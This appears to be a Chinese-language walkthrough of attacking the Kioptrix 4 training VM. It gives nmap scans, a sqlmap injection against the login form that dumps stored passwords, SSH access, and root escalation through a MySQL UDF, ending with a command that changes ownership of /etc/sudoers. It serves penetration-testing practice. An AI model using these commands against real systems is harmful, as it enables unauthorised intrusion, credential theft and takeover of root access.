扫描主机

# 探测主机
nmap -sn -r 192.168.1.1/24 --min-rate 5555

nmap -A 192.168.1.130 -oA nmap-result

-A：启动Os检测，版本检测，脚本扫描和traceroute

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)      
| ssh-hostkey:
|   1024 9bad4ff21ec5f23914b9d3a00be84171 (DSA)
|_  2048 8540c6d541260534adf86ef2a76b4f0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).   
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)

Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Host script results:     
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 10h30m02s, deviation: 3h32m07s, median: 8h00m02s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:                           
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:                            
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2023-12-31T09:45:21-05:00

enum4linux-ng 192.168.1.130

Web

SQLMAP

使用 burpsuite 抓取请求包，写入123，然后使用sqlmap进行sql注入

POST /checklogin.php HTTP/1.1
Host: 192.168.1.130
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.130
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.130/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

myusername=admin&mypassword=123&Submit=Login 123

sqlmap -r 123 --level 3 --batch

sqlmap identified the following injection point(s) with a total of 1428 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    
    Type: time-based blind
---

sqlmap -r 123 --level 3 --batch -D members -T members --dump -C "username,password"

Database: members
Table: members
[2 entries]
+----------+-----------------------+
| username | password              |
+----------+-----------------------+
| robert   | ADGAdsafdfwt4gadfga== |
| john     | MyNameIsJohn          |
+----------+-----------------------+

受限Shell越狱

尝试使用SSH连接

ssh john@192.168.1.130 -oHostKeyAlgorithms=+ssh-dss

linux受限，只能使用指定的命令

成功出狱

提权

尝试sudo -l提权，列出目前的权限。

john@Kioptrix4:~$ sudo -l
[sudo] password for john: 
Sorry, user john may not run sudo on Kioptrix4.

查看具有suid权限

find / -perm -u=s -type f 2>/dev/null

可使用这个网站进行查看相关suid的利用

GTFOBins

尝试mysql提权

mysql 免密码登录

查看是否存在mysql udf函数

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so

创建函数

create function sys_eval returns string soname 'lib_mysqludf_sys.so';

mysql> select sys_eval('whoami');

+--------------------+
| sys_eval('whoami') |
+--------------------+
| root
              | 
+--------------------+
1 row in set (0.00 sec)

成功执行命令

将/etc/sudoers的所有者和用户组，修改为john用户

select sys_eval('chown -R john:john /etc/sudoers');

并给写的权限，修改完文件后，保存退出，将权限恢复原来的权限